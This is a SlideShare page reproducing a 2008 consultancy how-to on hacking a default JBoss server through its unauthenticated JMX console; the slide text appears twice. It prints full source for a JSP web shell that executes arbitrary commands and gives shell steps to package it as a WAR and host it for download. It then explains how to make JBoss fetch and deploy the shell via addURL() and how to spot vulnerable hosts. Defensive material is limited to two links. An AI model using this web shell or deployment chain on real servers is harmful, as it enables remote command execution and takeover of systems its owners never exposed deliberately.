SlideShare ist ein Scribd-Unternehmen logo

Jboss Exploit

D
drkimsky
1 von 6
Downloaden Sie, um offline zu lesen
Hacking jBoss Hacking a default jBoss installation using a browser Jörg Scheinert joerg.scheinert@nruns.com IT Security Consultant, n.runs AG n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure, IT Security ,IT Business Consulting and IT Applications. For additional information visit the n.runs AG website at www.nruns.com.
Table of Contents 1. Introduction........................................................................................................ 3 2. Jboss................................................................................................................. 3 2.1. Default installation...................................................................................... 3 2.2. JMX Console ............................................................................................. 3 3. Deploy a web application................................................................................... 4 3.1. The web application ................................................................................... 4 3.2. Deploy it..................................................................................................... 5 4. Execute your code (hacker view) ....................................................................... 6 5. Secure the JMX Console (administrator view) ................................................... 6 Page 2 of 6 28.02.2008 n.runs AG
1. Introduction This paper is a brief how-to on hacking a default Jboss installation using the JMX-Console. 2. Jboss Jboss is an open source, standards-compliant application server which is based on J2EE (Java 2 Enterprise Edition). Being a Java-based application, it is generally platform- independent. 2.1. Default installation The default configuration of Jboss is relatively open and thereby provides the administrator – as well as hackers - with many possibilities to compromise it. 2.2. JMX Console 1 The JMX console can be remotely accessed on port 8080 in the default configuration. The JMX console provides a view into the microkernel of the Jboss application server, as well as access to the MBeans of the application server. The JMX console can be used to configure the MBeans of the Jboss server. By default the JMX console on http://[host]:8080/jmx-console can be accessed without any authentication. 1 http://en.wikipedia.org/wiki/JMX n.runs AG 28.02.2008 Page 3 of 6
3. Deploy a web application In order to deploy new applications on the application server, it is only necessary to configure the DeploymentScanner by adding a new URL with a customized WAR (Web ARchive) file. 2 The DeploymentScanner regularly checks the configured URLs for new applications to deploy. By default it only checks the URL file:/[JBOSSHOME]/server/default/deploy/, but with the addURL() command, it is possible to add a new URL with an application. Jboss will get the application from this URL. The next step is to wait for the DeploymentScanner to run the next time (usually about one minute), and access the new application. 3.1. The web application It is necessary to create a WAR file with WEB-INF a JSP to execute system commands. Here is a short example: $ echo 'The JSP to execute the commands' $ cat >cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> $ echo 'The web.xml file in the WEB-INF directory configures the web application' $ mkdir WEB-INF $ cat >WEB-INF/web.xml <?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app> $ echo 'Now put it into the WAR file' $ jar cvf cmd.war WEB-INF cmd.jsp $ echo 'Copy it on a web server where the Jboss server can get it' $ cp cmd.war /var/www/localhost/htdocs/ 2 http://wiki.jboss.org/wiki/Wiki.jsp?page=DeploymentScanner Page 4 of 6 28.02.2008 n.runs AG
More information can be found at: WAR file: http://en.wikipedia.org/wiki/Sun_WAR_%28file_format%29 Creating a WAR file: http://access1.sun.com/techarticles/simple.WAR.html JSP: http://en.wikipedia.org/wiki/JavaServer_Pages 3.2. Deploy it 1. Navigate the browser to the jboss.deployment:flavor=URL,type=DeploymentScanner mbean (http://[host]:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL) 2. Add the URL of the customized WAR file with the addURL() command Invoke: Success: 3. Wait for the DeploymentScanner.... n.runs AG 28.02.2008 Page 5 of 6
4. Access the deployed application 4. Execute your code (hacker view) What needs to be deployed in order to execute the desired commands on the Jboss server? To access an application with the browser, a web application should be deployed. For example put a command.jsp into the WAR file and upload it to the web server. The WAR file should be deployed, wait for the DeploymentScanner and execute commands using the command.jsp. These commands will be executed with the privileges of the Jboss server. 4.1. Identifying vulnerable systems Identifying vulnerable systems is easy, just check for page : http://[host]:8080/jmx- console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=Deplo ymentScanner,flavor=URL and the string "addURL()". 5. Secure the JMX Console (administrator view) http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole http://jira.jboss.com/jira/secure/attachment/12313981/index.html n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure, IT Security, IT Business Consulting and IT Applications. Founded in 2001, n.runs specializes in helping its customers to solve their information technology problems proactively and reactively. n.runs delivers services in the areas of network design planning and implementation consulting, technical security consulting such as secure design, application auditing, development of customized security solutions, information security management consulting and specialized application products. Based in Oberursel and Berlin, Germany, n.runs offers its knowledge and expertise to clients all over the world. For additional information visit the n.runs AG website at www.nruns.com. Page 6 of 6 28.02.2008 n.runs AG

Empfohlen

Technical Aspects of SLiMS
Technical Aspects of SLiMSTechnical Aspects of SLiMS
Technical Aspects of SLiMShendrowicaksono
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0py_sunil
 
XSS Defeating Trick ~=ABK=~ WhitePaper
XSS Defeating Trick ~=ABK=~ WhitePaperXSS Defeating Trick ~=ABK=~ WhitePaper
XSS Defeating Trick ~=ABK=~ WhitePaperAbhishek Kumar
 
IIS Web Ecosystem
IIS Web EcosystemIIS Web Ecosystem
IIS Web EcosystemKenny Abdiel Maita
 
Enterprise managerclodcontrolinstallconfiguration emc12c
Enterprise managerclodcontrolinstallconfiguration emc12cEnterprise managerclodcontrolinstallconfiguration emc12c
Enterprise managerclodcontrolinstallconfiguration emc12cRakesh Gujjarlapudi
 
Power shell
Power shellPower shell
Power shellRajkiran Swain
 
Making the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolMaking the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
 
Apache
ApacheApache
Apachersibbaluca
 

Empfohlen

Technical Aspects of SLiMS
Technical Aspects of SLiMSTechnical Aspects of SLiMS
Technical Aspects of SLiMShendrowicaksono
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0py_sunil
 
XSS Defeating Trick ~=ABK=~ WhitePaper
XSS Defeating Trick ~=ABK=~ WhitePaperXSS Defeating Trick ~=ABK=~ WhitePaper
XSS Defeating Trick ~=ABK=~ WhitePaperAbhishek Kumar
 
IIS Web Ecosystem
IIS Web EcosystemIIS Web Ecosystem
IIS Web EcosystemKenny Abdiel Maita
 
Enterprise managerclodcontrolinstallconfiguration emc12c
Enterprise managerclodcontrolinstallconfiguration emc12cEnterprise managerclodcontrolinstallconfiguration emc12c
Enterprise managerclodcontrolinstallconfiguration emc12cRakesh Gujjarlapudi
 
Power shell
Power shellPower shell
Power shellRajkiran Swain
 
Making the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolMaking the secure communication between Server and Client with https protocol
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
 
Apache
ApacheApache
Apachersibbaluca
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationChetan Soni
 
Swift configurator installation-manual
Swift configurator installation-manualSwift configurator installation-manual
Swift configurator installation-manualPramod Sharma
 
Android Storage - StorageManager & OBB
Android Storage - StorageManager & OBBAndroid Storage - StorageManager & OBB
Android Storage - StorageManager & OBBWilliam Lee
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET websitePositive Hack Days
 
Apache Web server Complete Guide
Apache Web server Complete GuideApache Web server Complete Guide
Apache Web server Complete Guidewebhostingguy
 
Java secure development part 3
Java secure development part 3Java secure development part 3
Java secure development part 3Rafel Ivgi
 
2014 Pre-MSc-IS-2 Infrastructure
2014 Pre-MSc-IS-2 Infrastructure2014 Pre-MSc-IS-2 Infrastructure
2014 Pre-MSc-IS-2 Infrastructureandreasmartin
 
AWS essentials EC2
AWS essentials EC2AWS essentials EC2
AWS essentials EC2mustafa sarac
 
User guide
User guide User guide
User guidericemjr124
 
Azure sharepointsql
Azure sharepointsqlAzure sharepointsql
Azure sharepointsqlPatrick Shim (심승욱)
 
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication( 16 ) Office 2007 Create An Extranet Site With Forms Authentication
( 16 ) Office 2007 Create An Extranet Site With Forms AuthenticationLiquidHub
 
Lab 1: Introduction to Amazon EC2 and MPI
Lab 1: Introduction to Amazon EC2 and MPILab 1: Introduction to Amazon EC2 and MPI
Lab 1: Introduction to Amazon EC2 and MPIZubair Nabi
 
AWS essentials S3
AWS essentials S3AWS essentials S3
AWS essentials S3mustafa sarac
 
GO SMS Backup, Restore, and Decrypt
GO SMS Backup, Restore, and Decrypt GO SMS Backup, Restore, and Decrypt
GO SMS Backup, Restore, and Decrypt Atiqa khan
 
Building drupal web farms with IIS - part 1
Building drupal web farms with IIS - part 1Building drupal web farms with IIS - part 1
Building drupal web farms with IIS - part 1Alessandro Pilotti
 
Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-VLai Yoong Seng
 
Pandora FMS: Raven DB Plugin
Pandora FMS: Raven DB PluginPandora FMS: Raven DB Plugin
Pandora FMS: Raven DB PluginPandora FMS
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website? Positive Hack Days
 
Detecting Malice
Detecting MaliceDetecting Malice
Detecting Malicedrkimsky
 
Vbaac
VbaacVbaac
Vbaacdrkimsky
 
Ajax Security
Ajax SecurityAjax Security
Ajax Securitydrkimsky
 

Weitere ähnliche Inhalte

Was ist angesagt?

Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationChetan Soni
 
Swift configurator installation-manual
Swift configurator installation-manualSwift configurator installation-manual
Swift configurator installation-manualPramod Sharma
 
Android Storage - StorageManager & OBB
Android Storage - StorageManager & OBBAndroid Storage - StorageManager & OBB
Android Storage - StorageManager & OBBWilliam Lee
 
Apache Web server Complete Guide
Apache Web server Complete GuideApache Web server Complete Guide
Apache Web server Complete Guidewebhostingguy
 
Java secure development part 3
Java secure development part 3Java secure development part 3
Java secure development part 3Rafel Ivgi
 
2014 Pre-MSc-IS-2 Infrastructure
2014 Pre-MSc-IS-2 Infrastructure2014 Pre-MSc-IS-2 Infrastructure
2014 Pre-MSc-IS-2 Infrastructureandreasmartin
 
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication( 16 ) Office 2007 Create An Extranet Site With Forms Authentication
( 16 ) Office 2007 Create An Extranet Site With Forms AuthenticationLiquidHub
 
Lab 1: Introduction to Amazon EC2 and MPI
Lab 1: Introduction to Amazon EC2 and MPILab 1: Introduction to Amazon EC2 and MPI
Lab 1: Introduction to Amazon EC2 and MPIZubair Nabi
 
GO SMS Backup, Restore, and Decrypt
GO SMS Backup, Restore, and Decrypt GO SMS Backup, Restore, and Decrypt
GO SMS Backup, Restore, and Decrypt Atiqa khan
 
Building drupal web farms with IIS - part 1
Building drupal web farms with IIS - part 1Building drupal web farms with IIS - part 1
Building drupal web farms with IIS - part 1Alessandro Pilotti
 
Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-VLai Yoong Seng
 
Pandora FMS: Raven DB Plugin
Pandora FMS: Raven DB PluginPandora FMS: Raven DB Plugin
Pandora FMS: Raven DB PluginPandora FMS
 

Was ist angesagt? (19)

Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
Wamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and ConfigurationWamp & LAMP - Installation and Configuration
Wamp & LAMP - Installation and Configuration
 
Swift configurator installation-manual
Swift configurator installation-manualSwift configurator installation-manual
Swift configurator installation-manual
 
Android Storage - StorageManager & OBB
Android Storage - StorageManager & OBBAndroid Storage - StorageManager & OBB
Android Storage - StorageManager & OBB
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
Apache Web server Complete Guide
Apache Web server Complete GuideApache Web server Complete Guide
Apache Web server Complete Guide
 
Java secure development part 3
Java secure development part 3Java secure development part 3
Java secure development part 3
 
2014 Pre-MSc-IS-2 Infrastructure
2014 Pre-MSc-IS-2 Infrastructure2014 Pre-MSc-IS-2 Infrastructure
2014 Pre-MSc-IS-2 Infrastructure
 
AWS essentials EC2
AWS essentials EC2AWS essentials EC2
AWS essentials EC2
 
User guide
User guide User guide
User guide
 
Azure sharepointsql
Azure sharepointsqlAzure sharepointsql
Azure sharepointsql
 
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication( 16 ) Office 2007 Create An Extranet Site With Forms Authentication
( 16 ) Office 2007 Create An Extranet Site With Forms Authentication
 
Lab 1: Introduction to Amazon EC2 and MPI
Lab 1: Introduction to Amazon EC2 and MPILab 1: Introduction to Amazon EC2 and MPI
Lab 1: Introduction to Amazon EC2 and MPI
 
AWS essentials S3
AWS essentials S3AWS essentials S3
AWS essentials S3
 
GO SMS Backup, Restore, and Decrypt
GO SMS Backup, Restore, and Decrypt GO SMS Backup, Restore, and Decrypt
GO SMS Backup, Restore, and Decrypt
 
Building drupal web farms with IIS - part 1
Building drupal web farms with IIS - part 1Building drupal web farms with IIS - part 1
Building drupal web farms with IIS - part 1
 
Understanding AzMan In Hyper-V
Understanding AzMan In Hyper-VUnderstanding AzMan In Hyper-V
Understanding AzMan In Hyper-V
 
Pandora FMS: Raven DB Plugin
Pandora FMS: Raven DB PluginPandora FMS: Raven DB Plugin
Pandora FMS: Raven DB Plugin
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
 

Andere mochten auch

Detecting Malice
Detecting MaliceDetecting Malice
Detecting Malicedrkimsky
 
Ajax Security
Ajax SecurityAjax Security
Ajax Securitydrkimsky
 
Spi dynamik-sql-inj
Spi dynamik-sql-injSpi dynamik-sql-inj
Spi dynamik-sql-injdrkimsky
 
Comm Web Virtual Payment Client
Comm Web Virtual Payment ClientComm Web Virtual Payment Client
Comm Web Virtual Payment Clientdrkimsky
 
Ajax Security Dangers
Ajax Security DangersAjax Security Dangers
Ajax Security Dangersdrkimsky
 
Documents About [Credit Card]
Documents About [Credit Card]Documents About [Credit Card]
Documents About [Credit Card]abaraham mores
 

Andere mochten auch (7)

Detecting Malice
Detecting MaliceDetecting Malice
Detecting Malice
 
Vbaac
VbaacVbaac
Vbaac
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Spi dynamik-sql-inj
Spi dynamik-sql-injSpi dynamik-sql-inj
Spi dynamik-sql-inj
 
Comm Web Virtual Payment Client
Comm Web Virtual Payment ClientComm Web Virtual Payment Client
Comm Web Virtual Payment Client
 
Ajax Security Dangers
Ajax Security DangersAjax Security Dangers
Ajax Security Dangers
 
Documents About [Credit Card]
Documents About [Credit Card]Documents About [Credit Card]
Documents About [Credit Card]
 

Ähnlich wie Jboss Exploit

Jboss App Server
Jboss App ServerJboss App Server
Jboss App Serveracosdt
 
Getting started guide
Getting started guideGetting started guide
Getting started guideBlueace1
 
Getting started guide1
Getting started guide1Getting started guide1
Getting started guide1Blueace1
 
Deployment Tactics
Deployment TacticsDeployment Tactics
Deployment TacticsIan Barber
 
Drupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployDrupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployJohn Smith
 
OFM SOA Suite 11gR1 – Installation Demonstration
OFM SOA Suite 11gR1 – Installation DemonstrationOFM SOA Suite 11gR1 – Installation Demonstration
OFM SOA Suite 11gR1 – Installation DemonstrationSreenivasa Setty
 
Phonegap android angualr material design
Phonegap android angualr material designPhonegap android angualr material design
Phonegap android angualr material designSrinadh Kanugala
 
Protractor Testing Automation Tool Framework / Jasmine Reporters
Protractor Testing Automation Tool Framework / Jasmine ReportersProtractor Testing Automation Tool Framework / Jasmine Reporters
Protractor Testing Automation Tool Framework / Jasmine ReportersHaitham Refaat
 
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agents
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agentsPVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agents
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agentsAndrey Karpov
 
Deploying configurable frontend web application containers
Deploying configurable frontend web application containersDeploying configurable frontend web application containers
Deploying configurable frontend web application containersJosé Moreira
 
Setting up the hyperledger composer in ubuntu
Setting up the hyperledger composer in ubuntuSetting up the hyperledger composer in ubuntu
Setting up the hyperledger composer in ubuntukesavan N B
 
Meetup Performance
Meetup PerformanceMeetup Performance
Meetup PerformanceGreg Whalin
 
Prizm Installation Guide
Prizm Installation GuidePrizm Installation Guide
Prizm Installation Guidevjvarenya
 
Story about module management with angular.js
Story about module management with angular.jsStory about module management with angular.js
Story about module management with angular.jsDavid Amend
 
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETSilicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETMats Bryntse
 
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R..."Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...Fwdays
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
 

Ähnlich wie Jboss Exploit (20)

Jboss App Server
Jboss App ServerJboss App Server
Jboss App Server
 
Getting started guide
Getting started guideGetting started guide
Getting started guide
 
Getting started guide1
Getting started guide1Getting started guide1
Getting started guide1
 
Deployment Tactics
Deployment TacticsDeployment Tactics
Deployment Tactics
 
Drupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployDrupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - Deploy
 
OFM SOA Suite 11gR1 – Installation Demonstration
OFM SOA Suite 11gR1 – Installation DemonstrationOFM SOA Suite 11gR1 – Installation Demonstration
OFM SOA Suite 11gR1 – Installation Demonstration
 
Java EE Services
Java EE ServicesJava EE Services
Java EE Services
 
Phonegap android angualr material design
Phonegap android angualr material designPhonegap android angualr material design
Phonegap android angualr material design
 
Protractor Testing Automation Tool Framework / Jasmine Reporters
Protractor Testing Automation Tool Framework / Jasmine ReportersProtractor Testing Automation Tool Framework / Jasmine Reporters
Protractor Testing Automation Tool Framework / Jasmine Reporters
 
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agents
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agentsPVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agents
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agents
 
Deploying configurable frontend web application containers
Deploying configurable frontend web application containersDeploying configurable frontend web application containers
Deploying configurable frontend web application containers
 
Setting up the hyperledger composer in ubuntu
Setting up the hyperledger composer in ubuntuSetting up the hyperledger composer in ubuntu
Setting up the hyperledger composer in ubuntu
 
Meetup Performance
Meetup PerformanceMeetup Performance
Meetup Performance
 
Meetup Performance
Meetup PerformanceMeetup Performance
Meetup Performance
 
Jboss Tutorial Basics
Jboss Tutorial BasicsJboss Tutorial Basics
Jboss Tutorial Basics
 
Prizm Installation Guide
Prizm Installation GuidePrizm Installation Guide
Prizm Installation Guide
 
Story about module management with angular.js
Story about module management with angular.jsStory about module management with angular.js
Story about module management with angular.js
 
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETSilicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NET
 
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R..."Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 

Jboss Exploit

  • 1. Hacking jBoss Hacking a default jBoss installation using a browser Jörg Scheinert joerg.scheinert@nruns.com IT Security Consultant, n.runs AG n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure, IT Security ,IT Business Consulting and IT Applications. For additional information visit the n.runs AG website at www.nruns.com.
  • 2. Table of Contents 1. Introduction........................................................................................................ 3 2. Jboss................................................................................................................. 3 2.1. Default installation...................................................................................... 3 2.2. JMX Console ............................................................................................. 3 3. Deploy a web application................................................................................... 4 3.1. The web application ................................................................................... 4 3.2. Deploy it..................................................................................................... 5 4. Execute your code (hacker view) ....................................................................... 6 5. Secure the JMX Console (administrator view) ................................................... 6 Page 2 of 6 28.02.2008 n.runs AG
  • 3. 1. Introduction This paper is a brief how-to on hacking a default Jboss installation using the JMX-Console. 2. Jboss Jboss is an open source, standards-compliant application server which is based on J2EE (Java 2 Enterprise Edition). Being a Java-based application, it is generally platform- independent. 2.1. Default installation The default configuration of Jboss is relatively open and thereby provides the administrator – as well as hackers - with many possibilities to compromise it. 2.2. JMX Console 1 The JMX console can be remotely accessed on port 8080 in the default configuration. The JMX console provides a view into the microkernel of the Jboss application server, as well as access to the MBeans of the application server. The JMX console can be used to configure the MBeans of the Jboss server. By default the JMX console on http://[host]:8080/jmx-console can be accessed without any authentication. 1 http://en.wikipedia.org/wiki/JMX n.runs AG 28.02.2008 Page 3 of 6
  • 4. 3. Deploy a web application In order to deploy new applications on the application server, it is only necessary to configure the DeploymentScanner by adding a new URL with a customized WAR (Web ARchive) file. 2 The DeploymentScanner regularly checks the configured URLs for new applications to deploy. By default it only checks the URL file:/[JBOSSHOME]/server/default/deploy/, but with the addURL() command, it is possible to add a new URL with an application. Jboss will get the application from this URL. The next step is to wait for the DeploymentScanner to run the next time (usually about one minute), and access the new application. 3.1. The web application It is necessary to create a WAR file with WEB-INF a JSP to execute system commands. Here is a short example: $ echo 'The JSP to execute the commands' $ cat >cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> $ echo 'The web.xml file in the WEB-INF directory configures the web application' $ mkdir WEB-INF $ cat >WEB-INF/web.xml <?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app> $ echo 'Now put it into the WAR file' $ jar cvf cmd.war WEB-INF cmd.jsp $ echo 'Copy it on a web server where the Jboss server can get it' $ cp cmd.war /var/www/localhost/htdocs/ 2 http://wiki.jboss.org/wiki/Wiki.jsp?page=DeploymentScanner Page 4 of 6 28.02.2008 n.runs AG
  • 5. More information can be found at: WAR file: http://en.wikipedia.org/wiki/Sun_WAR_%28file_format%29 Creating a WAR file: http://access1.sun.com/techarticles/simple.WAR.html JSP: http://en.wikipedia.org/wiki/JavaServer_Pages 3.2. Deploy it 1. Navigate the browser to the jboss.deployment:flavor=URL,type=DeploymentScanner mbean (http://[host]:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL) 2. Add the URL of the customized WAR file with the addURL() command Invoke: Success: 3. Wait for the DeploymentScanner.... n.runs AG 28.02.2008 Page 5 of 6
  • 6. 4. Access the deployed application 4. Execute your code (hacker view) What needs to be deployed in order to execute the desired commands on the Jboss server? To access an application with the browser, a web application should be deployed. For example put a command.jsp into the WAR file and upload it to the web server. The WAR file should be deployed, wait for the DeploymentScanner and execute commands using the command.jsp. These commands will be executed with the privileges of the Jboss server. 4.1. Identifying vulnerable systems Identifying vulnerable systems is easy, just check for page : http://[host]:8080/jmx- console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=Deplo ymentScanner,flavor=URL and the string "addURL()". 5. Secure the JMX Console (administrator view) http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole http://jira.jboss.com/jira/secure/attachment/12313981/index.html n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure, IT Security, IT Business Consulting and IT Applications. Founded in 2001, n.runs specializes in helping its customers to solve their information technology problems proactively and reactively. n.runs delivers services in the areas of network design planning and implementation consulting, technical security consulting such as secure design, application auditing, development of customized security solutions, information security management consulting and specialized application products. Based in Oberursel and Berlin, Germany, n.runs offers its knowledge and expertise to clients all over the world. For additional information visit the n.runs AG website at www.nruns.com. Page 6 of 6 28.02.2008 n.runs AG